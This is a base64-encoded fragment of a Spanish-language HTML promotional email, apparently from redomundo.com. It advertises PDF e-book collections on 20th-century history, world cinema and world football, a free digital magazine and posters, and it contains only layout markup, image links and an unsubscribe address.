IGhlaWdodD0iMjAiIGNvbHNwYW49IjMiIGNsYXNzPSJvIj48Zm9udCBzaXplPSIyIiBmYWNlPSJW
ZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj48YSBocmVmPSJodHRwOi8vd3d3
LnJlZG9tdW5kby5jb20vY2dpLWJpbi9vYnNlcXVpby5wbCIgY2xhc3M9InJvIj48Zm9udCBjb2xv
cj0iI0ZGRkZGRiI+PHN0cm9uZz48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNl
cmlmIj5QVUJMSUNBQ0lPTkVTIHwgRS1CT09LUyB8IEVOQ0lDTE9QRURJQVMgfCBOT1ZFREFERVMg
fCBQJk9hY3V0ZTtTVEVSIHwgT0JTRVFVSU9TPC9mb250Pjwvc3Ryb25nPjwvZm9udD48L2E+PGZv
bnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+PHN0cm9uZz48Zm9udCBjb2xv
cj0iI0ZGRkZGRiI+PC9zcGFuPjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PC9mb250PjwvdGQ+CiAg
ICAgICAgPC90cj4KICAgICAgPHRyPgogICAgICAgIDx0ZCB3aWR0aD0iOSIgdmFsaWduPSJ0b3Ai
IGJnY29sb3I9IiMwMDAwMDAiPjxpbWcgc3JjPSJodHRwOi8vd3d3LnJlZG9tdW5kby5jb20vZW1h
aWwvc3BhY2VyLmdpZiIgd2lkdGg9IjMiIGhlaWdodD0iMSI+IDwvdGQ+CiAgICAgICAgPHRkIHdp
ZHRoPSI0MTUiIHZhbGlnbj0idG9wIiBiZ2NvbG9yPSIjMDAwMDAwIj48dGFibGUgd2lkdGg9IjEw
MCUiIGJvcmRlcj0iMCIgY2VsbHBhZGRpbmc9IjEiIGNlbGxzcGFjaW5nPSIwIj4KICAgICAgICAg
IDx0cj4KICAgICAgICAgICAgPHRkIHdpZHRoPSI3MyIgYmdjb2xvcj0iIzAwMDAwMCI+PGltZyBz
cmM9Imh0dHA6Ly93d3cucmVkb211bmRvLmNvbS9lbWFpbC9sb2dvX25lZ3JvLmdpZiIgd2lkdGg9
IjczIiBoZWlnaHQ9IjU2Ij48L3RkPgogICAgICAgICAgICA8dGQgd2lkdGg9IjM1NSIgYmdjb2xv
cj0iIzAwMDAwMCI+PGltZyBzcmM9Imh0dHA6Ly93d3cucmVkb211bmRvLmNvbS9lbWFpbC90aXR1
bG9fbmVncm8uZ2lmIiB3aWR0aD0iMzM0IiBoZWlnaHQ9IjU2Ij48L3RkPgogICAgICAgICAgPC90
cj4KICAgICAgICAgIDx0ciBhbGlnbj0iY2VudGVyIiB2YWxpZ249Im1pZGRsZSI+CiAgICAgICAg
ICAgIDx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIwODM4NkIiPjx0YWJsZSB3aWR0aD0iNDAwIiBi
b3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIyIiBjZWxscGFkZGluZz0iMiI+CiAgICAgICAgICAgICAg
ICA8dHI+CiAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgIDxwIGNs
YXNzPSJyb3BvciI+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1z
ZXJpZiI+PHN0cm9uZz48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgc2l6ZT0iMiI+UkVET01VTkRPLkNP
TSBwcmVzZW50YSBlbiBleGNsdXNpdmEgbXVuZGlhbCBsYSB2ZXJzaSZvYWN1dGU7biBlbGVjdHIm
b2FjdXRlO25pY2EgZGUgbGFzIHB1YmxpY2FjaW9uZXMgJnF1b3Q7Q3Imb2FjdXRlO25pY2EgR2Vu
ZXJhbCBkZWwgU2lnbG8gWFgmcXVvdDsgKDEwIHRvbW9zKSwgJnF1b3Q7SGlzdG9yaWEgTXVuZGlh
bCBkZWwgQ2luZSZxdW90OyAoMTQgdG9tb3MpIGUgJnF1b3Q7SGlzdG9yaWEgR2VuZXJhbCBkZWwg
RiZ1YWN1dGU7dGJvbCBNdW5kaWFsJnF1b3Q7ICgxMiB0b21vcyksIGVuIGZvcm1hdG8gZGlnaXRh
bCAoUERGKS48L2ZvbnQ+PC9zdHJvbmc+PC9mb250PjwvcD4KICAgICAgICAgICAgICAgICAgICAg
IDxwPjxmb250IGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPjxz
dHJvbmc+PGZvbnQgY29sb3I9IiNGRkZGRkYiIHNpemU9IjIiPlN1c2NyJmlhY3V0ZTtiYXNlIGhv
eSBtaXNtbyB5IG9idGVuZ2EgZXN0YSBwdWJsaWNhY2kmb2FjdXRlO24gY29uIGRlc2NhcmdhIGlu
bWVkaWF0YSBlbiBjdWFscXVpZXIgbHVnYXIgZGVsIG11bmRvLjwvZm9udD48L3N0cm9uZz48L2Zv
bnQ+PC9wPgogICAgICAgICAgICAgICAgICAgICAgPHA+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJp
YWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+PHN0cm9uZz48Zm9udCBjb2xvcj0iI0ZGRkZGRiIg
c2l6ZT0iMiI+RGVzY2FyZ3VlIGRlIG1hbmVyYSBncmF0dWl0YSB1bmEgbXVlc3RyYSBwYXJhIHF1
ZSBjb21wcnVlYmUgbGEgYWx0YSBjYWxpZGFkIGRlIG51ZXN0cmFzIHB1YmxpY2FjaW9uZXMuPC9m
b250Pjwvc3Ryb25nPjwvZm9udD48L3A+CiAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAg
ICAgICAgICA8L3RyPgogICAgICAgICAgICA8L3RhYmxlPjwvdGQ+CiAgICAgICAgICA8L3RyPgog
ICAgICAgICAgPHRyIGFsaWduPSJjZW50ZXIiIHZhbGlnbj0ibWlkZGxlIj4KICAgICAgICAgICAg
PHRkIGNvbHNwYW49IjIiPjxpbWcgc3JjPSJodHRwOi8vd3d3LnJlZG9tdW5kby5jb20vZW1haWwv
c3BhY2VyLmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4KICAgICAgICAgIDwvdHI+CiAg
ICAgICAgICA8dHIgYmdjb2xvcj0iMzEzMDMxIj4KICAgICAgICAgICAgPHRkIGNvbHNwYW49IjIi
IGNsYXNzPSJ0ZXh0b19lbWFpbDEiPjxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgY29sb3I9IiNG
RkZGRkYiIHNpemU9IjIiIGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2Vy
aWYiPjxzdHJvbmc+Q1JPTklDQSAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LSAoUERGKTwvc3Ryb25nPiA8L2ZvbnQ+PC9kaXY+PC90ZD4KICAgICAgICAgIDwvdHI+CiAgICAg
ICAgICA8dHIgYWxpZ249ImNlbnRlciIgdmFsaWduPSJ0b3AiIGJnY29sb3I9IjMxMzAzMSI+CiAg
ICAgICAgICAgIDx0ZCBjb2xzcGFuPSIyIj48dGFibGUgd2lkdGg9IjM4MSIgYm9yZGVyPSIwIiBj
ZWxsc3BhY2luZz0iMyIgY2VsbHBhZGRpbmc9IjMiPgogICAgICAgICAgICAgICAgPHRyPgogICAg
ICAgICAgICAgICAgICA8dGQgd2lkdGg9IjU4IiByb3dzcGFuPSIyIj48YSBocmVmPSJodHRwOi8v
d3d3LnJlZG9tdW5kby5jb20vY2dpLWJpbi9vYnNlcXVpby5wbCI+PGltZyBzcmM9Imh0dHA6Ly93
d3cucmVkb211bmRvLmNvbS9lbWFpbC9jcm9uaWNhLmpwZyIgd2lkdGg9IjkxIiBoZWlnaHQ9IjEy
MCIgYm9yZGVyPSIwIj48L2E+PC90ZD4KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIyNDIi
PjxzdHJvbmc+PGZvbnQgY29sb3I9IiNGRkZGRkYiIHNpemU9IjIiIGZhY2U9IlZlcmRhbmEsIEFy
aWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPkNyJm9hY3V0ZTtuaWNhIEdlbmVyYWwgZGVsIFNp
Z2xvIFhYIDwvZm9udD48L3N0cm9uZz4gICAgICAgICAgICAgICAgICAgIDxwPjwvcD48Zm9udCBj
b2xvcj0iI0ZGRkZGRiIgc2l6ZT0iMSIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwg
c2Fucy1zZXJpZiI+TGFzIG5vdGljaWFzIG0mYWFjdXRlO3MgcmVzYWx0YW50ZXMgcXVlIGNvbm1v
dmllcm9uIGEgbGEgaHVtYW5pZGFkIGVuIAogIGxvcyAmdWFjdXRlO2x0aW1vcyAxMDAgYSZudGls
ZGU7b3MgbSZhYWN1dGU7cyB0dXJidWxlbnRvcyB5IGZhc2NpbmFudGVzLCBlbiAxMCAKICB0b21v
cyBkZSBjb2xlY2NpJm9hY3V0ZTtuLiBEaXNwb25pYmxlIGNhZGEgMTUgZCZpYWN1dGU7YXMgZW4g
Zm9ybWF0byAoUERGKS4gPC9mb250PjwvcD48L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAg
ICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgdmFs
aWduPSJib3R0b20iIGNsYXNzPSJzdHlsZXIxIj48Zm9udCBjb2xvcj0iI0ZGRkZDQyIgc2l6ZT0i
MSIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+KDEwIHRvbW9zKTwvZm9udD48
L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgPC90YWJsZT48L3RkPgogICAg
ICAgICAgPC90cj4KICAgICAgICAgIDx0ciBiZ2NvbG9yPSIzMTMwMzEiPgogICAgICAgICAgICA8
dGQgY29sc3Bhbj0iMiI+PGRpdiBhbGlnbj0iY2VudGVyIiBjbGFzcz0icm9wb3IiPjxmb250IGNv
bG9yPSIjRkZGRkZGIj48c3Ryb25nPjxmb250IHNpemU9IjIiIGZhY2U9IlZlcmRhbmEsIEFyaWFs
LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPkNJTkUgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tIChQREYpPC9mb250Pjwvc3Ryb25nPjwvZm9udD48L2Rpdj48L3RkPgog
ICAgICAgICAgPC90cj4KICAgICAgICAgIDx0ciBhbGlnbj0iY2VudGVyIiB2YWxpZ249InRvcCIg
Ymdjb2xvcj0iMzEzMDMxIj4KICAgICAgICAgICAgPHRkIGNvbHNwYW49IjIiPjx0YWJsZSB3aWR0
aD0iMzg1IiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIzIiBjZWxscGFkZGluZz0iMyI+CiAgICAg
ICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iNTgiIHJvd3NwYW49
IjIiPjxhIGhyZWY9Imh0dHA6Ly93d3cucmVkb211bmRvLmNvbS9jZ2ktYmluL29ic2VxdWlvLnBs
Ij48aW1nIHNyYz0iaHR0cDovL3d3dy5yZWRvbXVuZG8uY29tL2VtYWlsL2NpbmUuanBnIiB3aWR0
aD0iOTEiIGhlaWdodD0iMTIwIiBib3JkZXI9IjAiPjwvYT48L3RkPgogICAgICAgICAgICAgICAg
ICA8dGQgd2lkdGg9IjI0MiI+PHN0cm9uZz48c3BhbiBjbGFzcz0icm9wb3IiPjxmb250IGNvbG9y
PSIjRkZGRkZGIiBzaXplPSIyIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5z
LXNlcmlmIj5IaXN0b3JpYSBNdW5kaWFsCiAgICAgICAgICAgIGRlbCBDaW5lCiAgICAgICAgICAg
ICAgICAgIDwvZm9udD4gPC9zcGFuPjwvc3Ryb25nPgogICAgICAgICAgICAgICAgICAgIDxwIGFs
aWduPSJqdXN0aWZ5IiBjbGFzcz0ic3R5bGVyMiI+PGZvbnQgY29sb3I9IiNGRkZGRkYiIHNpemU9
IjEiIGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPkVsIG0mYWFj
dXRlO3MgY29tcGxldG8gcmVjb3JyaWRvIHBvciBlbCBjaW5lIGVzdCZhYWN1dGU7IGEgc3UgZGlz
cG9zaWNpJm9hY3V0ZTtuIGVuIGVzdGEgY29sZWNjaSZvYWN1dGU7biBxdWUgbGUgcGVybWl0aXIm
YWFjdXRlOyBjb25vY2VyIHRvZG8gYWNlcmNhIGRlbCBzJmVhY3V0ZTtwdGltbyBhcnRlLiBDYWRh
IDEwIGQmaWFjdXRlO2FzIGVuIGZvcm1hdG8gKFBERikuPC9mb250PjwvcD48L3RkPgogICAgICAg
ICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgPHRk
IGFsaWduPSJyaWdodCIgdmFsaWduPSJib3R0b20iIGNsYXNzPSJzdHlsZXIxIj48Zm9udCBjb2xv
cj0iI0ZGRkZDQyIgc2l6ZT0iMSIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+
KDE0IHRvbW9zKTwvZm9udD48L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAg
PC90YWJsZT48L3RkPgogICAgICAgICAgPC90cj4KICAgICAgICAgIDx0ciBiZ2NvbG9yPSIzMTMw
MzEiPgogICAgICAgICAgICA8dGQgY29sc3Bhbj0iMiI+PGRpdiBhbGlnbj0iY2VudGVyIiBjbGFz
cz0icm9wb3IiPjxzdHJvbmc+PGZvbnQgY29sb3I9IiNGRkZGRkYiIHNpemU9IjIiIGZhY2U9IlZl
cmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPkZVVEJPTCAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIChQREYpPC9mb250Pjwvc3Ryb25nPjwvZGl2Pjwv
dGQ+CiAgICAgICAgICA8L3RyPgogICAgICAgICAgPHRyIGFsaWduPSJjZW50ZXIiIHZhbGlnbj0i
dG9wIiBiZ2NvbG9yPSIzMTMwMzEiPgogICAgICAgICAgICA8dGQgY29sc3Bhbj0iMiI+PHRhYmxl
IHdpZHRoPSIzODQiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjMiIGNlbGxwYWRkaW5nPSIzIj4K
ICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI5MyIgcm93
c3Bhbj0iMiI+PGEgaHJlZj0iaHR0cDovL3d3dy5yZWRvbXVuZG8uY29tL2NnaS1iaW4vb2JzZXF1
aW8ucGwiPjxpbWcgc3JjPSJodHRwOi8vd3d3LnJlZG9tdW5kby5jb20vZW1haWwvZnV0Ym9sLmpw
ZyIgd2lkdGg9IjkxIiBoZWlnaHQ9IjEyMCIgYm9yZGVyPSIwIj48L2E+PC90ZD4KICAgICAgICAg
ICAgICAgICAgPHRkIHdpZHRoPSIyNjMiPjxzdHJvbmc+PHNwYW4gY2xhc3M9InJvcG9yIj48Zm9u
dCBjb2xvcj0iI0ZGRkZGRiIgc2l6ZT0iMiIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGlj
YSwgc2Fucy1zZXJpZiI+SGlzdG9yaWEgR2VuZXJhbCBkZWwgRvp0Ym9sIE11bmRpYWwKICAgICAg
ICAgICAgICAgICAgPC9mb250PiA8L3NwYW4+PC9zdHJvbmc+CiAgICAgICAgICAgICAgICAgICAg
PHAgYWxpZ249Imp1c3RpZnkiIGNsYXNzPSJzdHlsZXIyIj48Zm9udCBjb2xvcj0iI0ZGRkZGRiIg
c2l6ZT0iMSIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+TGEg
ZmFzY2luYW50ZSBoaXN0b3JpYSBkZWwgZiZ1YWN1dGU7dGJvbCBtdW5kaWFsIHB1ZWRlIHRlbmVy
bGEgZW4gc3VzIG1hbm9zIGRlIGlubWVkaWF0byBlbiBlc3RhIGNvbGVjY2kmb2FjdXRlO24gZGUg
MTIgdG9tb3MuIENhZGEgMTAgZCZpYWN1dGU7YXMgZW4gZm9ybWF0byAoUERGKS48L2ZvbnQ+PC9w
PjwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgPHRyPgogICAgICAg
ICAgICAgICAgICA8dGQgaGVpZ2h0PSIxOSIgYWxpZ249InJpZ2h0IiB2YWxpZ249ImJvdHRvbSIg
Y2xhc3M9InN0eWxlcjEiPjxmb250IGNvbG9yPSIjRkZGRkNDIiBzaXplPSIxIiBmYWNlPSJBcmlh
bCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj4oMTIgdG9tb3MpPC9mb250PjwvdGQ+CiAgICAgICAg
ICAgICAgICA8L3RyPgogICAgICAgICAgICA8L3RhYmxlPjwvdGQ+CiAgICAgICAgICA8L3RyPgog
ICAgICAgICAgPHRyIGFsaWduPSJjZW50ZXIiIHZhbGlnbj0idG9wIj4KICAgICAgICAgICAgPHRk
IGNvbHNwYW49IjIiPjxpbWcgc3JjPSJodHRwOi8vd3d3LnJlZG9tdW5kby5jb20vZW1haWwvc3Bh
Y2VyLmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4KICAgICAgICAgIDwvdHI+CiAgICAg
ICAgICA8dHIgYWxpZ249ImNlbnRlciIgdmFsaWduPSJ0b3AiIGJnY29sb3I9IjlDMDAwMCI+CiAg
ICAgICAgICAgIDx0ZCBjb2xzcGFuPSIyIj48dGFibGUgd2lkdGg9IjQxMCIgYm9yZGVyPSIwIiBj
ZWxsc3BhY2luZz0iMiIgY2VsbHBhZGRpbmc9IjIiPgogICAgICAgICAgICAgICAgICA8dHI+CiAg
ICAgICAgICAgICAgICAgICAgPHRkIGhlaWdodD0iMTc2IiB2YWxpZ249InRvcCI+PHN0cm9uZz48
c3BhbiBjbGFzcz0iYW1hcmlsbG8iPjxmb250IGNvbG9yPSIjRkZGRkNDIiBzaXplPSIzIiBmYWNl
PSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5SZXBvcnQKICAgICAgICAgICAgICAgICAg
ICA8L2ZvbnQ+IDwvc3Bhbj48L3N0cm9uZz4KICAgICAgICAgICAgICAgICAgICAgIDxwIGFsaWdu
PSJsZWZ0IiBjbGFzcz0icm9wb3IiPjxmb250IHNpemU9IjEiIGZhY2U9IlZlcmRhbmEsIEFyaWFs
LCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPjxzdHJvbmc+PGZvbnQgY29sb3I9IiNGRkZGRkYiPkNh
ZGEgMTUgZCZpYWN1dGU7YXMgcmVjaWJpciZhYWN1dGU7IHNpbiBjb3N0byB1biBlamVtcGxhciBk
ZSBSZXBvcnQsIHVuYSByZXZpc3RhIGRpZ2l0YWwgKFBERikgcXVlIGxlIGluZm9ybWFyJmFhY3V0
ZTsgc29icmUgZWwgYWNvbnRlY2VyIGRlbCBmYXNjaW5hbnRlIG11bmRvIGRlbCBjaW5lIGRlc2Rl
IHN1cyBpbmljaW9zIGhhc3RhIGxhIGFjdHVhbGlkYWQsIGRlIGxvcyBzdWNlc29zIGRlbCBmJnVh
Y3V0ZTt0Ym9sIG11bmRpYWwsIHkgYWRlbSZhYWN1dGU7cyBkZSBsb3MgaGVjaG9zIG5vdGljaW9z
b3MgcXVlIGNvbm1vdmllcm9uIGEgbGEgaHVtYW5pZGFkIGVuIGxvcyAmdWFjdXRlO2x0aW1vcyAx
MDAgYSZudGlsZGU7b3M8L2ZvbnQ+PC9zdHJvbmc+PC9mb250PjwvcD4KICAgICAgICAgICAgICAg
ICAgICAgIDxwIGFsaWduPSJsZWZ0IiBjbGFzcz0icm9wb3IiPjxmb250IHNpemU9IjEiIGZhY2U9
IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPjxzdHJvbmc+PGZvbnQgY29s
b3I9IiNGRkZGRkYiPlN1c2NyaWJhc2UgaG95IG1pc21vIGEKICAgICAgICAgICAgICAgICAgICAg
IHd3dy5yZWRvbXVuZG8uY29tIHkgcmVjaWJpciZhYWN1dGU7IGNhZGEgMTUgZCZpYWN1dGU7YXMg
dW4gZWplbXBsYXIgZGUgUmVwb3J0LjwvZm9udD48L3N0cm9uZz48L2ZvbnQ+PC9wPjxwPiZuYnNw
OzwvcD48L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZCBhbGlnbj0iY2VudGVyIiB2YWxpZ249
Im1pZGRsZSI+PGEgaHJlZj0iaHR0cDovL3d3dy5yZWRvbXVuZG8uY29tL2NnaS1iaW4vb2JzZXF1
aW8ucGwiPjxpbWcgc3JjPSJodHRwOi8vd3d3LnJlZG9tdW5kby5jb20vZW1haWwvcmVwb3J0ZS5q
cGciIHdpZHRoPSIxMzAiIGhlaWdodD0iMTcwIiBib3JkZXI9IjAiPjwvYT48L3RkPgogICAgICAg
ICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgPC90YWJsZT4KICAgICAgICAgICAgICAg
IDwvdGQ+CiAgICAgICAgICA8L3RyPgogICAgICAgIDwvdGFibGU+PC90ZD4KICAgICAgICA8dGQg
d2lkdGg9IjI3NiIgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiM2MzY1NjMiPjx0YWJsZSB3aWR0aD0i
MTgyIiAgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPgogICAgICAg
ICAgPHRyPgogICAgICAgICAgICA8dGQ+PGltZyBzcmM9Imh0dHA6Ly93d3cucmVkb211bmRvLmNv
bS9lbWFpbC9hZHF1aWVyYV90b3AuanBnIiB3aWR0aD0iMTgyIiBoZWlnaHQ9IjQwIj48L3RkPgog
ICAgICAgICAgPC90cj4KICAgICAgICAgIDx0cj4KICAgICAgICAgICAgPHRkIGhlaWdodD0iMTI0
IiBhbGlnbj0iY2VudGVyIiB2YWxpZ249Im1pZGRsZSIgYmdjb2xvcj0iIzRCNjlBNyIgY2xhc3M9
InRleHRvX2VtYWlsMSBzdHlsZTYiPjxzdHJvbmc+PGEgaHJlZj0iaHR0cDovL3d3dy5yZWRvbXVu
ZG8uY29tL2NnaS1iaW4vb2JzZXF1aW8ucGwiPjxmb250IGNvbG9yPSIjRkZGRkZGIiBzaXplPSIy
IiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5Qb3IgaGFiZXIg
cmVjaWJpZG8gZXN0ZSBlLW1haWwgdXN0ZWQgc2UgaGEgaGVjaG8gYWNyZWVkb3IgZGVsIGUtYm9v
ayBIaXN0b3JpYSBHZW5lcmFsPGJyPgogIGRlbCBGJnVhY3V0ZTt0Ym9sIGRlIDUyIHAmYWFjdXRl
O2dpbmFzLDxicj4KICAgICAgICAgICAgICBzaW4gY29zdG8gYWxndW5vLjwvZm9udD48L2E+PC9z
dHJvbmc+PC90ZD4KICAgICAgICAgIDwvdHI+CiAgICAgICAgICA8dHI+CiAgICAgICAgICAgIDx0
ZCBoZWlnaHQ9IjE1NCIgYWxpZ249ImNlbnRlciIgdmFsaWduPSJtaWRkbGUiIGJnY29sb3I9IiM0
RjAxMDEiPjxhIGhyZWY9Imh0dHA6Ly93d3cucmVkb211bmRvLmNvbS9jZ2ktYmluL29ic2VxdWlv
LnBsIj48aW1nIHNyYz0iaHR0cDovL3d3dy5yZWRvbXVuZG8uY29tL2VtYWlsL2NvbGxlY2Npb24u
anBnIiB3aWR0aD0iMTc2IiBoZWlnaHQ9IjE0NSIgYm9yZGVyPSIwIj48L2E+PC90ZD4KICAgICAg
ICAgIDwvdHI+CiAgICAgICAgICA8dHI+CiAgICAgICAgICAgIDx0ZCBhbGlnbj0iY2VudGVyIiB2
YWxpZ249InRvcCIgYmdjb2xvcj0iIzAwMDAwMCI+CiAgICAgICAgICAgICAgPHRhYmxlIHdpZHRo
PSIxMDAlIiAgYm9yZGVyPSIwIiBhbGlnbj0iY2VudGVyIiBjZWxscGFkZGluZz0iMCIgY2VsbHNw
YWNpbmc9IjAiPgogICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICA8dGQgaGVp
Z2h0PSI5NSIgYWxpZ249ImNlbnRlciIgdmFsaWduPSJtaWRkbGUiIGJnY29sb3I9IjYzNjU2MyIg
Y2xhc3M9ImFtYXJpbGxvIj48c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly93d3cucmVkb211bmRvLmNv
bS9jZ2ktYmluL29ic2VxdWlvLnBsIj48Zm9udCBjb2xvcj0iI0ZGRkZDQyIgc2l6ZT0iMiIgZmFj
ZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+QW1wbCZpYWN1dGU7ZSBzdSBjdWx0dXJh
IGdlbmVyYWwgbGV5ZW5kbyBsYSBjb2xlY2NpJm9hY3V0ZTtuIEdyYW5kZXMgVGVtYXMgZW4gbGEg
cXVlIGVsIGNvbm9jaW1pZW50byBkZXNjb25vY2UgbG9zIGwmaWFjdXRlO21pdGVzPC9mb250Pjwv
YT48L3N0cm9uZz48L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgIDx0
cj4KICAgICAgICAgICAgICAgICAgPHRkIGFsaWduPSJjZW50ZXIiIHZhbGlnbj0ibWlkZGxlIiBi
Z2NvbG9yPSI2MzY1NjMiPjxhIGhyZWY9Imh0dHA6Ly93d3cucmVkb211bmRvLmNvbS9jZ2ktYmlu
L29ic2VxdWlvLnBsIj48aW1nIHNyYz0iaHR0cDovL3d3dy5yZWRvbXVuZG8uY29tL2VtYWlsL2Fk
cXVpZXJhX3Bvc3Rlci5qcGciIHdpZHRoPSIxNzciIGhlaWdodD0iMjI5IiBib3JkZXI9IjAiPjwv
YT48L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgIDx0cj4KICAgICAg
ICAgICAgICAgICAgPHRkIGhlaWdodD0iMTAxIiBiZ2NvbG9yPSI2MzY1NjMiIGNsYXNzPSJsZXRy
YV9hIj48ZGl2IGFsaWduPSJjZW50ZXIiIGNsYXNzPSJhbWFyaWxsbyI+PGZvbnQgc2l6ZT0iMiIg
ZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+PHN0cm9uZz48Zm9udCBjb2xvcj0i
I0ZGRkZDQyI+SW5pY2llIHN1IGNvbGVjY2kmb2FjdXRlO24gZGUgZmFudCZhYWN1dGU7c3RpY29z
IFAmb2FjdXRlO3N0ZXJzIGVuIHRhbWEmbnRpbGRlO28gZ2lnYW50ZSBhIHRyYXYmZWFjdXRlO3Mg
ZGUgbnVlc3RyYXMgaW5vbHZpZGFibGVzIGltJmFhY3V0ZTtnZW5lcyA8L2ZvbnQ+PC9zdHJvbmc+
PC9mb250PjwvZGl2PjwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAg
PHRyPgogICAgICAgICAgICAgICAgICA8dGQgaGVpZ2h0PSIxNzYiIGJnY29sb3I9IiM2MzY1NjMi
PjxkaXYgYWxpZ249ImNlbnRlciIgY2xhc3M9InN0eWxlMiI+PGEgaHJlZj0ibWFpbHRvOnVuc3Vi
c2NyaWJlQHJlZG9tdW5kby5jb20iPjxpbWcgc3JjPSJodHRwOi8vd3d3LnJlZG9tdW5kby5jb20v
ZW1haWwvYXF1aS5naWYiIHdpZHRoPSIxNzkiIGhlaWdodD0iMTcyIiBib3JkZXI9IjAiPjwvYT48
YnI+CiAgICAgICAgICAgICAgICAgIDwvZGl2PjwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgog
ICAgICAgICAgICA8L3RhYmxlPjwvdGQ+CiAgICAgICAgICA8L3RyPgogICAgICAgIDwvdGFibGU+
PC90ZD4KICAgICAgPC90cj4KICAgICAgPHRyIGFsaWduPSJjZW50ZXIiIHZhbGlnbj0ibWlkZGxl
IiBiZ2NvbG9yPSIjMDAwMDAwIj4KICAgICAgICA8dGQgaGVpZ2h0PSIyMCIgY29sc3Bhbj0iMyI+
PHNwYW4gY2xhc3M9Im8iPjxmb250IHNpemU9IjIiIGZhY2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2
ZXRpY2EsIHNhbnMtc2VyaWYiPjxhIGhyZWY9Imh0dHA6Ly93d3cucmVkb211bmRvLmNvbS9jZ2kt
YmluL29ic2VxdWlvLnBsIiBjbGFzcz0icm8iPjxmb250IGNvbG9yPSIjRkZGRkZGIj48c3Ryb25n
Pjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPlBVQkxJQ0FDSU9ORVMg
fCBFLUJPT0tTIHwgRU5DSUNMT1BFRElBUyB8IE5PVkVEQURFUyB8IFAmT2FjdXRlO1NURVIgfCBP
QlNFUVVJT1M8L2ZvbnQ+PC9zdHJvbmc+PC9mb250PjwvYT48Zm9udCBmYWNlPSJBcmlhbCwgSGVs
dmV0aWNhLCBzYW5zLXNlcmlmIj48c3Ryb25nPjxmb250IGNvbG9yPSIjRkZGRkZGIj48L2ZvbnQ+
